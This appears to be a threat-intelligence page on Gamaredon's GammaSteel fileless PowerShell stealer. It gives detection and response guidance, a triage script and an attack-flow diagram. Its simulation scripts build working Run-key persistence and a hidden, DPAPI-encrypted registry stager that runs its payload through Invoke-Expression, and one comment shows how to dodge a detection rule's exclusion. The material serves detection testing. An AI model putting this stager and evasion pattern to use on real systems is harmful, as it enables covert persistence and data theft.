SOC Prime Bias: Critical

08 Jun 2026 19:33 UTC

GammaSteel: Inside Gamaredon’s Unfolding Malware Chain

SOC Prime Team

Summary

The report describes GammaSteel, a new Gamaredon (UAC-0010) intrusion chain built around a fileless PowerShell stealer. The malware stores its 71 functions as DPAPI-encrypted values under the HKCU\Printers registry key, so no script file has to be written to disk. It collects documents from local drives, USB media, and files the user is actively editing, deduplicates them by MD5 hash, and exfiltrates them to the legitimate S3-compatible storage service Tebi.io, falling back to hard-coded Russian domains when the upload path is unavailable. The wider infrastructure also relies on dead-drop resolvers hosted on public platforms such as Telegram, Telegra.ph, Write.as, Rentry.co, and Mastodon, along with dynamic DNS services. The campaign continues to target Ukrainian government and critical infrastructure environments.

Investigation

Sekoia.io analyzed more than 70 artifacts, rebuilt the full PowerShell dropper, and identified registry-based persistence, a mutex, hidden scheduled PowerShell execution, and a multi-layered exfiltration scheme. The researchers mapped the dead-drop resolver infrastructure, catalogued 115 IP addresses, four domains, and several S3 credential sets, and observed automated updates made through Mastodon posts. They also noted similarities with the 2020 InvisiMole activity, particularly the use of DPAPI-encrypted payloads stored in the registry.

Mitigation

Organizations should monitor for unusual writes to HKCU\Printers (in particular binary or Base64-looking values that are not printer configuration), for PowerShell launched with a hidden window, and for the presence of the Global\assembly307 mutex. Outbound traffic to the identified S3 endpoint s3.tebi.io and to fallback infrastructure such as justsstop.ru and 165.22.170.129 should be blocked, after confirming that Tebi.io is not in legitimate use in the environment. Defenders should also deploy detections for the specific iPhone-style user-agent string and for Registry Run entries that invoke PowerShell scripts.

Response

If GammaSteel activity is detected, isolate the affected host, collect the HKCU\Printers registry hive (the affected user's NTUSER.DAT, or an export of the key), extract the DPAPI-protected payloads, and decrypt them where possible. Because the blobs are protected in the user's DPAPI scope, decryption requires that user's master key: either decrypt in the user's security context on the host, or decrypt offline from the master key files under %APPDATA%\Microsoft\Protect\<SID> together with the user's password (or, for domain accounts, the domain DPAPI backup key). Hunt across the environment for related artifacts, block the identified command-and-control URLs and domains, reset any compromised credentials, and perform a full forensic review to identify additional malicious modules.
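The following triage script is an added example covering both the monitoring points in the Mitigation section and the registry collection step above; it is not code from this page, from SOC Prime, or from Sekoia.io. It is meant to be run on the isolated host in the affected user's context. The DPAPI header bytes are the standard blob layout; the HKCU\Printers location, the Global\assembly307 mutex and the PowerShell-invoking Run entries come from the report. The assumption that payload values are stored as REG_BINARY DPAPI blobs, or as Base64 text of such blobs, is mine, so treat hits as candidates for manual review rather than confirmed infections.

```powershell
# Added triage example (not SOC Prime's or Sekoia.io's code). Run as the
# affected user on the isolated host. Assumption: payload values sit under
# HKCU\Printers as REG_BINARY DPAPI blobs or Base64-encoded blobs in REG_SZ.

# Every DPAPI blob starts with version 1 (4 bytes) followed by the DPAPI
# provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian layout.
$DpapiMagic = [byte[]](0x01,0x00,0x00,0x00,
                       0xD0,0x8C,0x9D,0xDF,0x01,0x15,0xD1,0x11,
                       0x8C,0x7A,0x00,0xC0,0x4F,0xC2,0x97,0xEB)

function Test-DpapiBlob {
    param([byte[]]$Bytes)
    if ($null -eq $Bytes -or $Bytes.Length -lt $DpapiMagic.Length) { return $false }
    for ($i = 0; $i -lt $DpapiMagic.Length; $i++) {
        if ($Bytes[$i] -ne $DpapiMagic[$i]) { return $false }
    }
    return $true
}

function ConvertTo-BlobBytes {
    # REG_BINARY arrives as byte[]; a REG_SZ value may hold a Base64 blob.
    param($Value)
    if ($Value -is [byte[]]) { return $Value }
    if ($Value -is [string]) {
        try { return [Convert]::FromBase64String($Value.Trim()) } catch { return $null }
    }
    return $null
}

function Get-SuspiciousPrinterValues {
    # Walk HKCU\Printers and its sub-keys, flag any value that parses as a DPAPI blob.
    $root = 'HKCU:\Printers'
    if (-not (Test-Path $root)) { return @() }
    $keys = @(Get-Item $root) + @(Get-ChildItem $root -Recurse -ErrorAction SilentlyContinue)
    $hits = foreach ($key in $keys) {
        foreach ($name in $key.GetValueNames()) {
            $bytes = ConvertTo-BlobBytes ($key.GetValue($name))
            if (Test-DpapiBlob $bytes) {
                [pscustomobject]@{ Key = $key.Name; Value = $name; Size = $bytes.Length; Blob = $bytes }
            }
        }
    }
    return @($hits)
}

function Get-PowerShellRunEntries {
    # Run/RunOnce values that launch PowerShell (or reference the staging key).
    $runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($rk in $runKeys) {
        if (-not (Test-Path $rk)) { continue }
        $item = Get-Item $rk
        foreach ($name in $item.GetValueNames()) {
            $cmd = [string]$item.GetValue($name)
            if ($cmd -match '(?i)powershell|pwsh|-enc|Printers') {
                [pscustomobject]@{ Key = $rk; Name = $name; Command = $cmd }
            }
        }
    }
}

function Test-GammaSteelMutex {
    # OpenExisting throws if the mutex does not exist; access denied means it does.
    try {
        $m = [System.Threading.Mutex]::OpenExisting('Global\assembly307')
        $m.Dispose()
        return $true
    } catch [System.Threading.WaitHandleCannotBeOpenedException] { return $false }
      catch [System.UnauthorizedAccessException] { return $true }
}

function Unprotect-DpapiBlob {
    # Succeeds only where the owning user's master key is available, i.e. in that
    # user's security context on the host. Returns raw bytes; encoding is unknown.
    param([byte[]]$Blob)
    Add-Type -AssemblyName System.Security
    try { return [System.Security.Cryptography.ProtectedData]::Unprotect($Blob, $null, 'CurrentUser') }
    catch { return $null }
}

$printerHits = Get-SuspiciousPrinterValues
$runHits     = @(Get-PowerShellRunEntries)
$mutexSeen   = Test-GammaSteelMutex

"Mutex Global\assembly307 present: $mutexSeen"
"Run/RunOnce entries invoking PowerShell: $($runHits.Count)"
$runHits | Format-Table -AutoSize
"DPAPI blobs under HKCU\Printers: $($printerHits.Count)"
foreach ($h in $printerHits) {
    $plain = Unprotect-DpapiBlob $h.Blob
    $state = if ($plain) { "decrypted $($plain.Length) bytes" } else { 'could not decrypt in this context' }
    "{0} [{1}] {2} bytes: {3}" -f $h.Key, $h.Value, $h.Size, $state
}
```

Decrypted bytes should be written out for analysis rather than executed; if the script is run from a different account or from an offline hive, the DPAPI step will fail by design and the offline master-key route described above applies.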

Attack Flow

    graph TB
    %% Class definitions
    classDef technique fill:#e6f7ff
    classDef process fill:#ffebcc
    classDef action fill:#c2f0c2
    classDef tool fill:#dddddd
    classDef storage fill:#ffe6e6
    classDef network fill:#d9d9ff
    classDef data fill:#f0e68c

    %% Nodes – techniques
    tech_T1027_009["<b>Technique</b> – <b>T1027.009 Embedded Payloads</b><br/>Obfuscates payload within another file"]
    class tech_T1027_009 technique
    tech_T1027_007["<b>Technique</b> – <b>T1027.007 Dynamic API Resolution</b><br/>Resolves APIs at runtime to avoid static analysis"]
    class tech_T1027_007 technique
    tech_T1027_002["<b>Technique</b> – <b>T1027.002 Software Packing</b><br/>Packages malicious code to hide its true nature"]
    class tech_T1027_002 technique
    tech_T1027_013["<b>Technique</b> – <b>T1027.013 Encrypted/Encoded File</b><br/>Encrypts data using DPAPI before storage"]
    class tech_T1027_013 technique
    tech_T1547_001["<b>Technique</b> – <b>T1547.001 Registry Run Keys / Startup Folder</b><br/>Adds a Run key to achieve persistence"]
    class tech_T1547_001 technique
    tech_T1037_005["<b>Technique</b> – <b>T1037.005 Startup Items</b><br/>Uses startup items for persistence"]
    class tech_T1037_005 technique
    tech_T1680["<b>Technique</b> – <b>T1680 Local Storage Discovery</b><br/>Discovers local drives and user profiles"]
    class tech_T1680 technique
    tech_T1135["<b>Technique</b> – <b>T1135 Network Share Discovery</b><br/>Finds shared network locations"]
    class tech_T1135 technique
    tech_T1006["<b>Technique</b> – <b>T1006 Direct Volume Access</b><br/>Accesses removable media directly"]
    class tech_T1006 technique
    tech_T1025["<b>Technique</b> – <b>T1025 Data from Removable Media</b><br/>Collects data from USB devices"]
    class tech_T1025 technique
    tech_T1564_005["<b>Technique</b> – <b>T1564.005 Hidden File System</b><br/>Stores files in hidden locations"]
    class tech_T1564_005 technique
    tech_T1005["<b>Technique</b> – <b>T1005 Data from Local System</b><br/>Collects files from the local machine"]
    class tech_T1005 technique
    tech_T1537["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/>Uploads stolen data to cloud storage"]
    class tech_T1537 technique
    tech_T1538["<b>Technique</b> – <b>T1538 Cloud Service Dashboard</b><br/>Uses cloud service interfaces for data exfiltration"]
    class tech_T1538 technique
    tech_T1102_001["<b>Technique</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/>Retrieves commands and configuration from public web services"]
    class tech_T1102_001 technique
    tech_T1620["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/>Loads and executes code received at runtime"]
    class tech_T1620 technique

    %% Nodes – actions and components
    malware_dropper["<b>Malware</b> – <b>Name</b>: Initial Dropper<br/><b>Description</b>: Executes obfuscated PowerShell script"]
    class malware_dropper process
    process_powershell["<b>Process</b> – <b>Name</b>: PowerShell<br/><b>Role</b>: Runs encoded script"]
    class process_powershell process
    storage_dpapi["<b>Storage</b> – <b>Location</b>: HKCU\Printers<br/><b>Content</b>: 71 functions encrypted with DPAPI"]
    class storage_dpapi storage
    persistence_runkey["<b>Action</b> – <b>Persistence</b>: Registry Run key<br/><b>Key</b>: HKCU\Software\Microsoft\Windows\CurrentVersion\Run"]
    class persistence_runkey action
    process_hidden_ps["<b>Process</b> – <b>Name</b>: Hidden PowerShell<br/><b>Purpose</b>: Reads orchestrator from registry"]
    class process_hidden_ps process
    orchestrator["<b>Action</b> – <b>Orchestrator</b>: Enumerates resources and coordinates collection"]
    class orchestrator action
    enumeration["<b>Action</b> – <b>Enumeration</b>: Drives, profiles, network shares"]
    class enumeration action
    collection["<b>Action</b> – <b>Collection</b>: Gathers files from local and network locations"]
    class collection action
    monitor_usb["<b>Action</b> – <b>USB Monitoring</b>: WMI event subscription for removable media"]
    class monitor_usb action
    staging_folder["<b>Storage</b> – <b>Hidden Folder</b>: Staging area for copied files"]
    class staging_folder storage
    fs_watcher["<b>Process</b> – <b>Name</b>: FileSystemWatcher<br/><b>Function</b>: Monitors non-USB drives for changes"]
    class fs_watcher process
    deduplication["<b>Action</b> – <b>Deduplication</b>: Removes duplicate files before exfiltration"]
    class deduplication action
    upload_s3["<b>Action</b> – <b>Upload</b>: Sends data to S3-compatible bucket (tebi.io)"]
    class upload_s3 network
    fallback_post["<b>Action</b> – <b>Fallback Exfiltration</b>: POST to C2 domains mimicking iPhone UA"]
    class fallback_post network
    dead_drop["<b>Action</b> – <b>Dead Drop Resolver</b>: Retrieves config from Telegram, Telegra.ph, Write.as, Rentry.co, Mastodon"]
    class dead_drop action
    vbscript_backdoor["<b>Action</b> – <b>Secondary Backdoor</b>: Executes arbitrary VBScript from HTTP response"]
    class vbscript_backdoor action

    %% Connections – flow
    malware_dropper -->|uses| tech_T1027_009
    malware_dropper -->|uses| tech_T1027_007
    malware_dropper -->|uses| tech_T1027_002
    malware_dropper -->|stores encrypted data| tech_T1027_013
    malware_dropper -->|launches| process_powershell
    process_powershell -->|writes encrypted functions to| storage_dpapi
    storage_dpapi -->|enables| persistence_runkey
    persistence_runkey -->|creates| tech_T1547_001
    persistence_runkey -->|creates| tech_T1037_005
    persistence_runkey -->|starts| process_hidden_ps
    process_hidden_ps -->|loads orchestrator from registry| orchestrator
    orchestrator -->|performs| enumeration
    enumeration -->|covers| tech_T1680
    enumeration -->|covers| tech_T1135
    orchestrator -->|collects data using| collection
    collection -->|uses| tech_T1005
    collection -->|includes removable media via| tech_T1025
    collection -->|includes direct volume access via| tech_T1006
    collection -->|triggers| monitor_usb
    monitor_usb -->|copies files to| staging_folder
    staging_folder -->|is hidden by| tech_T1564_005
    staging_folder -->|monitored by| fs_watcher
    fs_watcher -->|detects changes and triggers| deduplication
    deduplication -->|uploads to cloud via| upload_s3
    upload_s3 -->|relies on| tech_T1537
    upload_s3 -->|fallback to| fallback_post
    fallback_post -->|relies on| tech_T1538
    orchestrator -->|gets updates from| dead_drop
    dead_drop -->|uses| tech_T1102_001
    dead_drop -->|delivers| vbscript_backdoor
    vbscript_backdoor -->|leverages| tech_T1620

    %% Styling assignments
    class malware_dropper,process_powershell,process_hidden_ps,fs_watcher,orchestrator,monitor_usb,vbscript_backdoor builtin
    class storage_dpapi,staging_folder builtin
    class persistence_runkey,enumeration,collection,deduplication,upload_s3,fallback_post,dead_drop action
    class tech_T1027_009,tech_T1027_007,tech_T1027_002,tech_T1027_013,tech_T1547_001,tech_T1037_005,tech_T1680,tech_T1135,tech_T1006,tech_T1025,tech_T1564_005,tech_T1005,tech_T1537,tech_T1538,tech_T1102_001,tech_T1620 technique

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker, having compromised a low-privileged user account, wants to stage an encoded PowerShell payload without touching the file system. They write the Base64-encoded payload into the Run key so that it executes at the next logon. The detection rule has a single excluded value under HKCU\Printers, so they deliberately stage the payload in a different sub-key under HKCU\Printers, mimicking the "printer-staging" pattern observed in Gamaredon samples.

  • Regression Test Script:

    # --------------------------------------------------------------
    # Simulate Gamaredon PowerShell Registry Staging (TC-20260608-A1B2C)
    # --------------------------------------------------------------
    
    # 1. Define a harmless PowerShell command (prints a message) and Base64-encode
    #    it as UTF-16LE, which is what powershell.exe -enc expects
    $payload = 'Write-Host "Gamaredon simulation executed"'
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Persist the payload via the Run key (persistence)
    $runKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    New-ItemProperty -Path $runKey -Name 'GamaredonStager' -Value "powershell -enc $b64" -PropertyType String -Force
    
    # 3. Stage the same payload in a "printer" key (fileless staging)
    $printerKey = 'HKCU:\Printers\YxwHku2chu0bznt3kkyAD'  # Note: different suffix to avoid the rule's exclusion
    New-Item -Path $printerKey -Force | Out-Null
    Set-ItemProperty -Path $printerKey -Name 'EncryptedPS' -Value $b64 -Force
    
    Write-Host "Simulation complete - registry entries created."
  • Cleanup Commands:

    # Remove Run key entry
    Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'GamaredonStager' -ErrorAction SilentlyContinue
    
    # Remove printer staging key
    Remove-Item -Path 'HKCU:\Printers\YxwHku2chu0bznt3kkyAD' -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "Cleanup complete - registry artifacts removed."
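The regression script above stages a plain Base64 string, whereas the reported chain stores DPAPI-protected values and has a Run key launch a hidden PowerShell loader that reads and decrypts them. The following variant is an added example, not part of this page and not SOC Prime's or Sekoia.io's code, that reproduces that shape so the DPAPI write, the hidden loader, and the registry read all generate telemetry. The sub-key, value and Run-entry names are arbitrary test names I chose; the payload is harmless and the script removes everything it created.

```powershell
# Added simulation variant (not SOC Prime's or Sekoia.io's code): stage a
# DPAPI-protected payload under HKCU\Printers and let a Run-key loader read,
# unprotect and execute it in a hidden PowerShell window, as the report describes.
# Sub-key, value and Run-entry names below are assumed test names.
Add-Type -AssemblyName System.Security

$printerKey = 'HKCU:\Printers\GammaSteelSimDpapi'
$valueName  = 'f01'
$runKey     = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$runName    = 'GammaSteelDpapiStager'

function Set-StagedPayload {
    # Encode as UTF-16LE (what -EncodedCommand expects), protect with the current
    # user's DPAPI master key, and store as REG_BINARY under the printer key.
    param([string]$Script)
    $plain = [Text.Encoding]::Unicode.GetBytes($Script)
    $blob  = [Security.Cryptography.ProtectedData]::Protect($plain, $null, 'CurrentUser')
    New-Item -Path $printerKey -Force | Out-Null
    New-ItemProperty -Path $printerKey -Name $valueName -Value $blob -PropertyType Binary -Force | Out-Null
    return $blob.Length
}

function Get-StagedPayload {
    # Loader side: read the blob back and unprotect it in the same user's context.
    $blob  = [byte[]](Get-ItemProperty -Path $printerKey -Name $valueName).$valueName
    $plain = [Security.Cryptography.ProtectedData]::Unprotect($blob, $null, 'CurrentUser')
    return [Text.Encoding]::Unicode.GetString($plain)
}

function Set-LoaderRunEntry {
    # The loader itself is passed via -EncodedCommand so the Run value holds no
    # readable script, only a hidden PowerShell invocation.
    $loader = @"
Add-Type -AssemblyName System.Security
`$b = [byte[]](Get-ItemProperty -Path '$printerKey' -Name '$valueName').'$valueName'
`$p = [Security.Cryptography.ProtectedData]::Unprotect(`$b, `$null, 'CurrentUser')
Invoke-Expression ([Text.Encoding]::Unicode.GetString(`$p))
"@
    $enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($loader))
    $cmd = "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $enc"
    New-ItemProperty -Path $runKey -Name $runName -Value $cmd -PropertyType String -Force | Out-Null
    return $cmd
}

function Invoke-Simulation {
    $size      = Set-StagedPayload 'Write-Host "Gamaredon DPAPI staging simulation executed"'
    $roundTrip = Get-StagedPayload
    $cmd       = Set-LoaderRunEntry
    # Fire the loader now instead of waiting for the next logon.
    Start-Process -FilePath 'powershell.exe' -ArgumentList ($cmd -replace '^powershell\.exe\s+', '') -WindowStyle Hidden -Wait
    return [pscustomobject]@{
        BlobBytes   = $size
        RoundTripOk = ($roundTrip -like 'Write-Host*')
        RunValue    = $cmd
    }
}

function Remove-Simulation {
    Remove-ItemProperty -Path $runKey -Name $runName -ErrorAction SilentlyContinue
    Remove-Item -Path $printerKey -Recurse -Force -ErrorAction SilentlyContinue
}

Invoke-Simulation | Format-List
Remove-Simulation
```

Expected telemetry from this run: a REG_BINARY write under HKCU\Printers whose content begins with the DPAPI blob header, a Run value invoking powershell.exe with -WindowStyle Hidden and -EncodedCommand, and a hidden child PowerShell process reading the same printer key, which are the three observables the Mitigation section asks defenders to monitor.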